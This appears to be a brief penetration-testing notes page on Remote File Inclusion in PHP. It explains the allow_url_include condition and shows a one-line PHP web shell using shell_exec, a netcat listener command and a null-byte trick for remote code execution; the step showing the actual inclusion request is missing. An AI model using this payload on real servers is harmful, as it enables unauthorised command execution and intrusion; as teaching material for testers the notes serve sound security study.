RFI

RFI is possible in PHP when the allow_url_include directive is set to On within php.ini.

Host an evil file via HTTP (apache2/python/etc):

<?php echo shell_exec("cmd");?>

Set up a listener for debugging: nc -lvnp 80

Call the file:

This goes to our web server and grabs the evil file. We see is that it requests GET /evil.txt.php from our webserver so we just add a null byte %00 to the end of it to stop it from appending the php. Then it works and since it will be read by the php engine we have RCE:

Txt is used because if we were to use a .php extension then the file would actually run on the attacker machine.

PreviousLFI NextUnrestricted File Uploads

Last updated 3 years ago

Was this helpful?